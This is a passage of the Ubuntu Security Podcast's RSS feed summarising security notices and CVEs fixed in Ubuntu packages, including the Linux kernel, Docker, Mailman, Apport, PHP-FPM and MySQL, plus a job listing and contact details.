were to then combine this with a content security policy which blocked
a redirect, the image URL may then contain any authentication tokens -
and so if a page could trick a user into copying and pasting that image
URL into the page an attacker could steal their auth token</li>
<li>Various web framework issues</li>
</ul>
</li>
</ul>
<h3 id="usn-5132-1-thunderbird-vulnerabilities-01-56">[<a href="https://ubuntu.com/security/notices/USN-5132-1">USN-5132-1</a>] Thunderbird vulnerabilities [01:56]</h3>
<ul>
<li>6 CVEs addressed in Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38501">CVE-2021-38501</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38500">CVE-2021-38500</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38498">CVE-2021-38498</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38497">CVE-2021-38497</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38496">CVE-2021-38496</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32810">CVE-2021-32810</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>91.2.1
<ul>
<li>Usual web framework issues</li>
</ul>
</li>
</ul>
<h3 id="usn-5133-1-icu-vulnerability-02-17">[<a href="https://ubuntu.com/security/notices/USN-5133-1">USN-5133-1</a>] ICU vulnerability [02:17]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-21913">CVE-2020-21913</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>unicode handling library</li>
<li>UAF - could be triggered if was packaging the ICU data with malicious
input -&gt; crash / RCU</li>
</ul>
<h3 id="usn-5135-1-linux-kernel-vulnerability-02-43">[<a href="https://ubuntu.com/security/notices/USN-5135-1">USN-5135-1</a>] Linux kernel vulnerability [02:43]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3759">CVE-2021-3759</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>impish (5.13), hirsute (5.11), focal hwe (5.11)</li>
<li>IPC memory objects not properly accounted for in memcg - could allow to
bypass limits and cause DoS</li>
</ul>
<h3 id="usn-5130-1-linux-kernel-vulnerabilities-03-24">[<a href="https://ubuntu.com/security/notices/USN-5130-1">USN-5130-1</a>] Linux kernel vulnerabilities [03:24]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-29660">CVE-2020-29660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29661">CVE-2020-29661</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>3.13</li>
<li>2 vulns courtesy of Jann Horn (GPZ) - in tty subsystem - lock order
issues - UAF - DoS/privesc (<a href="https://ubuntusecuritypodcast.org/episode-106/">Episode 106</a>)</li>
</ul>
<h3 id="usn-5136-1-linux-kernel-vulnerabilities-04-06">[<a href="https://ubuntu.com/security/notices/USN-5136-1">USN-5136-1</a>] Linux kernel vulnerabilities [04:06]</h3>
<ul>
<li>9 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42252">CVE-2021-42252</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38199">CVE-2021-38199</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3759">CVE-2021-3759</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3753">CVE-2021-3753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3743">CVE-2021-3743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3655">CVE-2021-3655</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36385">CVE-2020-36385</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36322">CVE-2020-36322</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19449">CVE-2019-19449</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 (bionic, xenial hwe, trusty azure)</li>
<li>IPC memory object leak plus various other vulns from <a href="https://ubuntusecuritypodcast.org/episode-136/">Episode 136</a></li>
</ul>
<h3 id="usn-5137-1-linux-kernel-vulnerabilities-04-48">[<a href="https://ubuntu.com/security/notices/USN-5137-1">USN-5137-1</a>] Linux kernel vulnerabilities [04:48]</h3>
<ul>
<li>10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42252">CVE-2021-42252</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3759">CVE-2021-3759</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3753">CVE-2021-3753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3743">CVE-2021-3743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3739">CVE-2021-3739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35477">CVE-2021-35477</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34556">CVE-2021-34556</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3428">CVE-2021-3428</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36385">CVE-2020-36385</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19449">CVE-2019-19449</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 (focal, bionic hwe)</li>
</ul>
<h3 id="usn-5134-1-docker-vulnerability-04-50">[<a href="https://ubuntu.com/security/notices/USN-5134-1">USN-5134-1</a>] Docker vulnerability [04:50]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-41092">CVE-2021-41092</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>If was using a private registry for <code>docker login</code> but also had configured
<code>credsStore</code> and <code>credsHelper</code> in <code>~/.docker/config.json</code> <strong>and</strong> these were not
able to be executed (ie. execute bit not set or not in <code>$PATH</code>), then creds
would get sent to the <strong>public</strong> docker registry rather than the configured
private registry.</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="hiring-06-00">Hiring [06:00]</h3>
<h4 id="security-product-manager">Security - Product Manager</h4>
<ul>
<li>HOME BASED - EMEA (Europe, Middle East, Africa)</li>
<li>Role includes:
<ul>
<li>guiding the evolution of security offerings from Canonical and Ubuntu</li>
<li>driving compliance and certification of Ubuntu</li>
<li>engaging with the open source security community</li>
<li>telling the story of Canonical&rsquo;s work to deliver secure platforms</li>
</ul>
</li>
<li><a href="https://canonical.com/careers/2278145/security-product-manager-remote">https://canonical.com/careers/2278145/security-product-manager-remote</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E137.mp3" length="5718463" type="audio/mpeg" /><itunes:duration>7:20</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 136
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-136/</link>
          <pubDate>Fri, 05 Nov 2021 15:22:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>eb56ebc24c87e251a795c264678bf0eed56741e4d0897ae4eff711dcd6c10b33615284793a71e6852ec3ae4d7b8ec15a3d86c0858ecf4b2d7dd4bed9f6c93b57</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 136</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          The road to Ubuntu 22.04 LTS begins so we look at some of its planned
  features plus we cover security updates for the Linux kernel, Mailman,
  Apport, PHP, Bind and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  The road to Ubuntu 22.04 LTS begins so we look at some of its planned
  features plus we cover security updates for the Linux kernel, Mailman,
  Apport, PHP, Bind and more.
  </itunes:summary>
        <description>  The road to Ubuntu 22.04 LTS begins so we look at some of its planned
  features plus we cover security updates for the Linux kernel, Mailman,
  Apport, PHP, Bind and more.
  </description>
        <googleplay:description>  The road to Ubuntu 22.04 LTS begins so we look at some of its planned
  features plus we cover security updates for the Linux kernel, Mailman,
  Apport, PHP, Bind and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>The road to Ubuntu 22.04 LTS begins so we look at some of its planned
features plus we cover security updates for the Linux kernel, Mailman,
Apport, PHP, Bind and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>92 unique CVEs addressed</p>
<h3 id="usn-5114-1-linux-kernel-vulnerabilities-01-15">[<a href="https://ubuntu.com/security/notices/USN-5114-1">USN-5114-1</a>] Linux kernel vulnerabilities [01:15]</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42008">CVE-2021-42008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-40490">CVE-2021-40490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38198">CVE-2021-38198</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-3702">CVE-2020-3702</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 + HWE on ESM</li>
<li>Race in ath9k -&gt; could fail to properly encrypt traffic -&gt; info leak</li>
<li>KVM shadow pages perms -&gt; local user DoS</li>
<li>ext4 race in xattr handling - local DoS / priv-esc</li>
<li>6pack driver validation failure -&gt; DoS / code-exec</li>
</ul>
<h3 id="usn-5115-1-linux-kernel--oem--vulnerabilities-02-19">[<a href="https://ubuntu.com/security/notices/USN-5115-1">USN-5115-1</a>] Linux kernel (OEM) vulnerabilities [02:19]</h3>
<ul>
<li>16 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42008">CVE-2021-42008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-40490">CVE-2021-40490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38205">CVE-2021-38205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38204">CVE-2021-38204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38166">CVE-2021-38166</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3759">CVE-2021-3759</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3753">CVE-2021-3753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3743">CVE-2021-3743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3739">CVE-2021-3739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3732">CVE-2021-3732</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37159">CVE-2021-37159</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3679">CVE-2021-3679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35477">CVE-2021-35477</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34556">CVE-2021-34556</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33624">CVE-2021-33624</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-3702">CVE-2020-3702</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.10 OEM</li>
<li>As above plus various BPF hardening fixes against spectre-like attacks,
fixes for security issues in tracing subsystem, overlayfs, btrfs,
Qualcomm IPC router, Xilinx ethernet driver info leak</li>
</ul>
<h3 id="usn-5116-1-usn-5116-2-linux-kernel-vulnerabilities-02-55">[<a href="https://ubuntu.com/security/notices/USN-5116-1">USN-5116-1</a>, <a href="https://ubuntu.com/security/notices/USN-5116-2">USN-5116-2</a>] Linux kernel vulnerabilities [02:55]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42008">CVE-2021-42008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-40490">CVE-2021-40490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38205">CVE-2021-38205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38198">CVE-2021-38198</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3732">CVE-2021-3732</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-3702">CVE-2020-3702</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 + KVM + bionic HWE + clouds (AWS, Azure, GCP, GKE, IBM, Oracle + RPi)</li>
<li>Race in ath9k -&gt; could fail to properly encrypt traffic -&gt; info leak</li>
<li>KVM shadow pages perms -&gt; local user DoS</li>
<li>ext4 race in xattr handling - local DoS / priv-esc</li>
<li>6pack driver validation failure -&gt; DoS / code-exec</li>
<li>overlayfs + xilinx</li>
</ul>
<h3 id="usn-5117-1-linux-kernel--oem--vulnerabilities-03-29">[<a href="https://ubuntu.com/security/notices/USN-5117-1">USN-5117-1</a>] Linux kernel (OEM) vulnerabilities [03:29]</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3759">CVE-2021-3759</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3753">CVE-2021-3753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3743">CVE-2021-3743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3739">CVE-2021-3739</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.13 OEM</li>
<li>btrfs, qualcomm IPC, VT IOCTL handling, memory leak in IPC object
handling</li>
</ul>
<h3 id="usn-5120-1-linux-kernel--azure--vulnerabilities-03-40">[<a href="https://ubuntu.com/security/notices/USN-5120-1">USN-5120-1</a>] Linux kernel (Azure) vulnerabilities [03:40]</h3>
<ul>
<li>9 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-40490">CVE-2021-40490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38207">CVE-2021-38207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38199">CVE-2021-38199</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3759">CVE-2021-3759</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3612">CVE-2021-3612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22543">CVE-2021-22543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36311">CVE-2020-36311</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26541">CVE-2020-26541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19449">CVE-2019-19449</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.8 Azure</li>
</ul>
<h3 id="usn-5119-1-libcaca-vulnerabilities-03-53">[<a href="https://ubuntu.com/security/notices/USN-5119-1">USN-5119-1</a>] libcaca vulnerabilities [03:53]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM),
Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-30499">CVE-2021-30499</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30498">CVE-2021-30498</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>text mode graphics handling library</li>
<li>2 buffer overflows -&gt; crash / code exec in handling of TGA images and
when exporting to troff format</li>
</ul>
<h3 id="usn-5121-1-usn-5121-2-mailman-vulnerabilities-04-24">[<a href="https://ubuntu.com/security/notices/USN-5121-1">USN-5121-1</a>, <a href="https://ubuntu.com/security/notices/USN-5121-2">USN-5121-2</a>] Mailman vulnerabilities [04:24]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), 5 CVEs
addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42096">CVE-2021-42096</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42097">CVE-2021-42097</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12137">CVE-2020-12137</a> (20.04 LTS only) <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15011">CVE-2020-15011</a> (20.04 LTS only) <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12108">CVE-2020-12108</a> (20.04 LTS only) <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different CSRF attacks against mailman - in first, failed to properly
associate CSRF tokens with accounts - could be used to take over
another account</li>
<li>In second, CSRF tokens which are generated are derived from the admin
password - could then allow a remote attacker to use this to help brute
force guess admin pw</li>
<li>In both cases need to already be an existing list member and be logged
in to mount attacks</li>
<li>For focal also included a couple medium priority vulns (don&rsquo;t affect
older versions):
<ul>
<li>Possible arbitrary content injection in 2 different ways which allow
content to be provided by an attacker as POST parameters to form
handling scripts which will then be incorporated into the page shown
to a user</li>
<li>So could allow an attacker to say inject a URL to be displayed on a
legitimate mailman admin page instance which an unsuspecting user
may then follow thinking this is trusted etc.</li>
</ul>
</li>
</ul>
<h3 id="usn-5122-1-usn-5122-2-apport-vulnerability-05-41">[<a href="https://ubuntu.com/security/notices/USN-5122-1">USN-5122-1</a>, <a href="https://ubuntu.com/security/notices/USN-5122-2">USN-5122-2</a>] Apport vulnerability [05:41]</h3>
<ul>
<li>Affecting Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)</li>
<li>Could trick Apport into writing core files into arbitrary directories -
then these could say be interpreted by other root-level applications to
escalate privileges</li>
<li>Changed Apport to write core files to known location
<code>/var/lib/apport/coredump</code></li>
</ul>
<h3 id="usn-5123-1-usn-5123-2-mysql-vulnerabilities-06-25">[<a href="https://ubuntu.com/security/notices/USN-5123-1">USN-5123-1</a>, <a href="https://ubuntu.com/security/notices/USN-5123-2">USN-5123-2</a>] MySQL vulnerabilities [06:25]</h3>
<ul>
<li>43 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal
(20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-35648">CVE-2021-35648</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35647">CVE-2021-35647</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35646">CVE-2021-35646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35645">CVE-2021-35645</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35644">CVE-2021-35644</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35643">CVE-2021-35643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35642">CVE-2021-35642</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35641">CVE-2021-35641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35640">CVE-2021-35640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35639">CVE-2021-35639</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35638">CVE-2021-35638</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35637">CVE-2021-35637</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35636">CVE-2021-35636</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35635">CVE-2021-35635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35634">CVE-2021-35634</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35633">CVE-2021-35633</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35632">CVE-2021-35632</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35631">CVE-2021-35631</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35630">CVE-2021-35630</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35628">CVE-2021-35628</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35627">CVE-2021-35627</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35626">CVE-2021-35626</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35625">CVE-2021-35625</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35624">CVE-2021-35624</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35623">CVE-2021-35623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35622">CVE-2021-35622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35613">CVE-2021-35613</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35612">CVE-2021-35612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35610">CVE-2021-35610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35608">CVE-2021-35608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35607">CVE-2021-35607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35604">CVE-2021-35604</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35602">CVE-2021-35602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35597">CVE-2021-35597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35596">CVE-2021-35596</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35591">CVE-2021-35591</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35584">CVE-2021-35584</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35577">CVE-2021-35577</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35575">CVE-2021-35575</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35546">CVE-2021-35546</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2481">CVE-2021-2481</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2479">CVE-2021-2479</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2478">CVE-2021-2478</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-27.html">8.0.27</a> in Ubuntu 20.04 LTS, Ubuntu 21.04 and Ubuntu 21.10</li>
<li><a href="https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-36.html">5.7.36</a> in Ubuntu 18.04 LTS, Ubuntu 16.04 ESM</li>
<li><a href="https://www.oracle.com/security-alerts/cpuoct2021.html">https://www.oracle.com/security-alerts/cpuoct2021.html</a></li>
</ul>
<h3 id="usn-5124-1-gnu-binutils-vulnerabilities-06-53">[<a href="https://ubuntu.com/security/notices/USN-5124-1">USN-5124-1</a>] GNU binutils vulnerabilities [06:53]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3487">CVE-2021-3487</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16592">CVE-2020-16592</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 issues in libbfd (binary file descriptor) - can be triggered by crafted
files
<ul>
<li>UAF in when using hash table impl</li>
<li>cause large memory allocation - crash</li>
</ul>
</li>
</ul>
<h3 id="usn-5009-2-libslirp-vulnerabilities-07-30">[<a href="https://ubuntu.com/security/notices/USN-5009-2">USN-5009-2</a>] libslirp vulnerabilities [07:30]</h3>
<ul>
<li>6 CVEs addressed in Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3595">CVE-2021-3595</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3594">CVE-2021-3594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3593">CVE-2021-3593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3592">CVE-2021-3592</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29130">CVE-2020-29130</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29129">CVE-2020-29129</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-124/">Episode 124</a></li>
</ul>
<h3 id="usn-5125-1-php-vulnerability-07-41">[<a href="https://ubuntu.com/security/notices/USN-5125-1">USN-5125-1</a>] PHP vulnerability [07:41]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM),
Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-21703">CVE-2021-21703</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Root code exec in PHP-FPM - uses a privileged root level process and
unpriv child worker processes but child could access shared memory with
parent and cause it to do OOB R/W -&gt; code execution in parent -&gt; priv-esc</li>
</ul>
<h3 id="usn-5126-1-usn-5126-2-bind-vulnerability-08-33">[<a href="https://ubuntu.com/security/notices/USN-5126-1">USN-5126-1</a>, <a href="https://ubuntu.com/security/notices/USN-5126-2">USN-5126-2</a>] Bind vulnerability [08:33]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM),
Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-25219">CVE-2021-25219</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible cache poisoning could lead to DoS via excessive entries in the
cache causing slow lookup performance</li>
</ul>
<h3 id="usn-5127-1-webkitgtk-vulnerabilities-08-55">[<a href="https://ubuntu.com/security/notices/USN-5127-1">USN-5127-1</a>] WebKitGTK vulnerabilities [08:55]</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42762">CVE-2021-42762</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30851">CVE-2021-30851</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30846">CVE-2021-30846</a> <!-- raw HTML omitted --></li>
